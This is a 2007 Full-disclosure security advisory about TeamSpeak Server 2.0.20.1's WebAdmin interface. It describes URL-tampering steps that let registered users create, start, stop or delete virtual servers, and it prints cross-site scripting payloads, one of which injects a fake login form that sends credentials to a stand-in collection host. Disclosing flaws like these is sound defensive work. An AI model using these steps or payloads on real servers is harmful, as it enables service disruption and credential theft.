Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17006
HistoryMay 12, 2007 - 12:00 a.m.

[Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities

2007-05-1200:00:00
vulners.com
4638

Hi everyone,
several months ago I discovered some vulnerabilities in TeamSpeak Server
WebAdmin interface.

I sent the advisory and exploit to the developers about two months ago
(11 03 2007), but the server is still vulnerable, today.

Affected software: Teamspeak Server 2.0.20.1

Looks like the beta build 2.0.23.15 isn't affected (or at least my
exploit doesn't work on that).

1) Privilege escalation can lead to Service Abuse or Denial of Service

TeamSpeak server is based on a "site" and multiple "virtual servers".

On each "site" there are one or more SuperAdmin users that can manage
the site configuration, adding more SuperAdmin users, adding, starting,
stopping or removing virtual servers or even manage each single server,
by selecting it from the web interface or the text-based one.

Each virtual server has one or more ServerAdmin users that can modify
virtual server parameters (like the name), adding new users for the
specified server (also new ServerAdmin users) and modify user privileges
relative to that virtual server.

The problem lies on the RegisteredUser privileges configuration page:
in that page are listed privileges intended to be associated to the
SuperAdmin role, like AdminAddServer or AdminStartServer. By activating
these privileges for the RegisteredUsers role, loggin in with a new
RegisteredUser account and doing some simple url tampering it is
possible to CREATE, START, STOP and DELETE virtual servers to the
site, without SuperAdmin access.

What is required:

  • ServerAdmin access to the web interface

Here is a simple exploit pattern:

  • As Server Admin with WebAdmin access:
  • check AccessWebAdminServer, AdminAddServer, AdminDeleteServer,
    AdminStartServer, AdminStopServer privileges for Registered users
  • create a new registered user
  • logout
  • As Registered User with WebAdmin access you can create a new
    virtual server:
  • login with the new account
  • change the url to http://your_site:your_port/server_manager_add.html
  • ADD NEW SERVER!!! (maybe you want to restrict codecs to get a usable
    default, like speex 12)
  • change the url to
    http://your_site:your_port/start_server.tscmd?serverid=N
    where N is the server ID (may require some guessing!)
  • NOW THE SERVER IS ONLINE!!!
  • Connect as ANONYMOUS to the server and ENJOY :)
  • As Registered User with WebAdmin access you can DELETE
    any existing virtual server:
  • As Registered User with WebAdmin access you can START or STOP
    any existing server:
  • login as Registered User
  • change the url to
    http://your_site:your_port/start_server.tscmd?serverid=N
    to start any server
  • change the url to
    http://your_site:your_port/stop_server.tscmd?serverid=N
    to stop any server

2) Cross Site Scripting

Pages ok_box.html and error_box.html are vulnerable to common Cross Site
Scripting attacks:

http://your_ts_server_here:14534/error_box.html?error_title=session
expired - please
login&error_text=<form action="http://127.0.0.1:31338/own.cgi&quot;&gt;User:
<input
type="text"><br>Pass: <input type="password"><br><br><input
type="submit"></form>&error_url=index.html

http://webadmin_uri:14534/ok_box.html?ok_title=%3Cscript%
3Ealert('hello')%3C/script%3E

Mitigation

Disable WebAdmin access.
Upgrade to beta release.

Gilberto Ficara

(sorry for my bad english :))